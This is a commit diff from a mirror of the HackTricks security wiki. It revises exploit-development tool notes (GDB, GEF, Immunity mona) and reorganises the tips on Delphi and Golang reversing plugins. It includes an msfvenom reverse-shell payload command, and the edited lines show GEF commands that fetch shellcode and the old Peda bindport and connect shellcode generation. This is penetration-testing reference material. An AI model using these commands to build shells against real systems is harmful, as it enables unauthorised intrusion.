Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 517 pages modified

Browse source
This commit is contained in:
CPol 2021-09-24 22:54:24 +00:00 committed by gitbook-bot
parent 39277cb65f
commit 2e2b279542
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 39 additions and 30 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

51
exploiting/tools/README.md
View file

@ -18,19 +18,21 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
## GDB
### Install:
### Install
```text
apt-get install gdb
```
### Parameters:
**-q** --&gt; No muestra mierda inicial al ejecutar gdb
**-x &lt;file&gt;** --&gt; le pasas un archivo con instrucciones de gdb que ejecutará al inicio
**-q** --&gt; No show banner
**-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here
**-p &lt;pid&gt;** --&gt; Attach to process
#### Instructions
&gt; **disassemble main** --&gt; Dissasemble the function
&gt; **disassemble main** --&gt; Disassemble the function
&gt; **disassemble 0x12345678**
&gt; **set disassembly-flavor intel**
&gt; **set follow-fork-mode child/parent** --&gt; Follow created process
@ -71,16 +73,25 @@ apt-get install gdb
* **x/xw &pointer** --&gt; Address where the poiniter is located
* **x/i $eip**&gt; Instructions of the EIP
### Peda
### [GEF](https://github.com/hugsy/gef)
**shellcode generate** x86/linux bindport 5555 127.0.0.1
**shellcode generate** x86/linux connect 5555 127.0.0.1
**checksec** --&gt; Check protections
**searchmem /bin/sh** --&gt; Find that string \(/bin/sh\) inside the memory
```bash
checksec #Check protections
search-pattern "/bin/sh" #Search in the process memory
#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61
#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
```
### GDB server
gdbserver --multi 0.0.0.0:23947 \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
## GCC
@ -126,7 +137,7 @@ nasm -f elf assembly.asm** --&gt; return a ".o"
## **Inmunity debugger**
```text
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
@ -145,21 +156,3 @@ Inside the IDA folder you can find binaries that can be used to debug a binary i
![](../../.gitbook/assets/image%20%28112%29.png)
### **Delphi binaries**
I you have to reverse a Delphi binary I would suggest you tu use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)\*\*\*\*
Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
This plugin will execute the binary and resolve functoin names dynamically att the start of the debugging. After starting the debugging press again the Start button \(the green one or f9\) and a breakpoint will hit in the begining of the real code.
It is also very interesting because if you press a boton in the graphic application the debugger will stop in the function executed by that bottom.
### Golang binaries
I you have to reverse a Golang binary I would suggest you tu use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
This will resolve the names of the functions.

18
reversing/reversing-tools-basic-methods/README.md
View file

@ -226,10 +226,26 @@ To find the **entry point** search the functions by `::main` like in:
In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.
Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
## Delphi
## **Delphi**
For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
I you have to reverse a Delphi binary I would suggest you to use the IDA plugin [https://github.com/Coldzer0/IDA-For-Delphi](https://github.com/Coldzer0/IDA-For-Delphi)\*\*\*\*
Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
This plugin will execute the binary and resolve function names dynamically at the start of the debugging. After starting the debugging press again the Start button \(the green one or f9\) and a breakpoint will hit in the beginning of the real code.
It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom.
## Golang
I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
Just press **ATL+f7** \(import python plugin in IDA\) and select the python plugin.
This will resolve the names of the functions.
## GBA - Game Body Advance
If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: